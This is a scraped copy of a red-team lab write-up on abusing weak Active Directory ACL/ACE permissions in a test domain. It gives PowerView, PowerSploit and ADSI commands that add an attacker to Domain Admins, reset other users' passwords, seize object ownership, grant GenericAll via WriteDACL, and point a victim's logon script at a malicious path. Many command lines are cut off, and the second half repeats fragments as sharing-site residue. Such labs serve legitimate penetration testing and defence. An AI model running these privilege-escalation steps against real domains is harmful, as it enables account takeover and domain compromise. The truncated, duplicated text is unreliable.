Abusing Active Directory ACLs - ACEs - Red Teaming Experiments PDF

27/07/2019 Abusing Active Directory ACLs/ACEs - Red Teaming Experiments
Abusing Active Directory ACLs/ACEs
Context
This lab is to abuse weak permissions of Active Directory Discretionary Access Control Lists
(DACLs) and Acccess Control Entries (ACEs) that make up DACLs.
Active Directory objects such as users and groups are securable objects and DACL/ACEs define
who can read/modify those objects (i.e change account name, reset password, etc).
An example of ACEs for the "Domain Admins" securable object can be seen here:
https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces 1/10
Some of the Active Directory object permissions and types that we as attackers are interested in:
GenericAll - full rights to the object (add users to a group or reset user's password)
GenericWrite - update object's attributes (i.e logon script)
WriteOwner - change object owner to attacker controlled user take over the object
WriteDACL - modify object's ACEs and give attacker full control right over the object
AllExtendedRights - ability to add user to a group or reset password
ForceChangePassword - ability to change user's password
Self (Self-Membership) - ability to add yourself to a group
In this lab, we are going to explore and try to exploit most of the above ACEs.
Execution
GenericAll on User
Using powerview, let's check if our attacking user spotless has GenericAll rights on the
AD object for the user delegate :
Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.ActiveDirectoryRight
We can see that indeed our user spotless has the GenericAll rights, effectively enabling the
attacker to take over the account:
We can reset user's delegate password without knowing the current password:
GenericAll on Group
Let's see if Domain admins group has any weak permissions. First of, let's get its
distinguishedName :
Get-NetGroup "domain admins" -FullData
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=o
We can see that our attacking user spotless has GenericAll rights once again:
Effectively, this allows us to add ourselves (the user spotless ) to the Domain Admin group:
net group "domain admins" spotless /add /domain
Same could be achieved with Active Directory or PowerSploit module:
1 # with active directory module

2 Add-ADGroupMember -Identity "domain admins" -Members spotless
3
4 # with Powersploit
5 Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense
WriteProperty on Group
If our controlled user has WriteProperty right on All objects for Domain Admin group:
We can again add ourselves to the Domain Admins group and escalate privileges:
net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain
Self (Self-Membership) on Group
Another privilege that enables the attacker adding themselves to a group:
net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain
WriteProperty (Self-Membership)
One more privilege that enables the attacker adding themselves to a group:
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=of
net group "domain admins" spotless /add /domain
ForceChangePassword
If we have ExtendedRight on User-Force-Change-Password object type, we can reset the

user's password without knowing their current password:
Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.IdentityReference -e
Doing the same with powerview:
Set-DomainUserPassword -Identity delegate -Verbose
Another method that does not require fiddling with password-secure-string conversion:
1 $c = Get-Credential
2 Set-DomainUserPassword -Identity delegate -AccountPassword $c.Password -Verbose
...or a one liner if no interactive session is not available:
Set-DomainUserPassword -Identity delegate -AccountPassword (ConvertTo-SecureStrin
WriteOwner on Group
Note how before the attack the owner of Domain Admins is Domain Admins :
After the ACE enumeration, if we find that a user in our control has WriteOwner rights on
ObjectType:All
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=of
...we can change the Domain Admins object's owner to our user, which in our case is
spotless . Note that the SID specified with -Identity is the SID of the Domain Admins
group:
Set-DomainObjectOwner -Identity S-1-5-21-2552734371-813931464-1050690807-512 -Own
GenericWrite on User
Get-ObjectAcl -ResolveGUIDs -SamAccountName delegate | ? {$_.IdentityReference -e
WriteProperty on an ObjectType , which in this particular case is Script-Path , allows the
attacker to overwrite the logon script path of the delegate user, which means that the next
time, when the user delegate logs on, their system will execute our malicious script:
Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\
Below shows the user's delegate logon script field got updated in the AD:
WriteDACL + WriteOwner
If you are the owner of a group, like I'm the owner of a Test AD group:
Which you can of course do through powershell:
([ADSI]"LDAP://CN=test,CN=Users,DC=offense,DC=local").PSBase.get_ObjectSecurity()
And you have a WriteDACL on that AD object:
...you can give yourself GenericAll privileges with a sprinkle of ADSI sorcery:
1 $ADSI = [ADSI]"LDAP://CN=test,CN=Users,DC=offense,DC=local"
2 $IdentityReference = (New-Object System.Security.Principal.NTAccount("spotless"
3 $ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityR
4 $ADSI.psbase.ObjectSecurity.SetAccessRule($ACE)
5 $ADSI.psbase.commitchanges()
Which means you now fully control the AD object:
This effectively means that you can now add new users to the group.
Interesting to note that I could not abuse these privileges by using Active Directory module and
Set-Acl / Get-Acl cmdlets:
1 $path = "AD:\CN=test,CN=Users,DC=offense,DC=local"
2 $acl = Get-Acl -Path $path
3 $ace = new-object System.DirectoryServices.ActiveDirectoryAccessRule (New-Objec
4 $acl.AddAccessRule($ace)
5 Set-Acl -Path $path -AclObject $acl
References
BloodHound 1.3 – The ACL Attack Path Update
Intro & Background In 2014, Emmanuel Gras and Lucas Bouillot

presented their work titled “Chemins de contrôle en environement
wald0.com
ActiveDirectoryRights Enum (System.DirectoryServices)
The enumeration specifies the access rights that are assigned to

an Active Directory Domain Services object.
docs.microsoft.com
Escalating privileges with ACLs in Active Directory
Researched and written by Rindert Kramer and Dirk-jan Mollema

Introduction During internal penetration tests, it happens quite
blog.fox-it.com
Scanning for Active Directory Privileges & Privileged Accounts
Active Directory Recon is the new hotness since attackers, Red

Teamers, and penetration testers have realized that control of
adsecurity.org
ActiveDirectoryAccessRule Constructor
(System.DirectoryServices)
Initializes a new instance of the class.

docs.microsoft.com
PowerView Tricks

Abusing Active Directory ACLs - ACEs - Red Teaming Experiments PDF

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Abusing Active Directory ACLs - ACEs - Red Teaming Experiments PDF

Uploaded by

Copyright:

Available Formats

27/07/2019 Abusing Active Directory ACLs/ACEs - Red Teaming Experiments

Abusing Active Directory ACLs/ACEs

Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.ActiveDirectoryRight

Get-NetGroup "domain admins" -FullData

Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=o

net group "domain admins" spotless /add /domain

Same could be achieved with Active Directory or PowerSploit module:

1 # with active directory module

net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain

Self (Self-Membership) on Group

Another privilege that enables the attacker adding themselves to a group:

net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain

Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=of

net group "domain admins" spotless /add /domain

If we have ExtendedRight on User-Force-Change-Password object type, we can reset the

Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.IdentityReference -e

Doing the same with powerview:

Set-DomainUserPassword -Identity delegate -Verbose

...or a one liner if no interactive session is not available:

Set-DomainUserPassword -Identity delegate -AccountPassword (ConvertTo-SecureStrin

Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=of

Set-DomainObjectOwner -Identity S-1-5-21-2552734371-813931464-1050690807-512 -Own

Get-ObjectAcl -ResolveGUIDs -SamAccountName delegate | ? {$_.IdentityReference -e

WriteProperty on an ObjectType , which in this particular case is Script-Path , allows the

Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\

Which you can of course do through powershell:

And you have a WriteDACL on that AD object:

Which means you now fully control the AD object:

BloodHound 1.3 – The ACL Attack Path Update

Intro & Background In 2014, Emmanuel Gras and Lucas Bouillot

ActiveDirectoryRights Enum (System.DirectoryServices)

The enumeration speciﬁes the access rights that are assigned to

Escalating privileges with ACLs in Active Directory

Researched and written by Rindert Kramer and Dirk-jan Mollema

Scanning for Active Directory Privileges & Privileged Accounts

Active Directory Recon is the new hotness since attackers, Red

Initializes a new instance of the class.

You might also like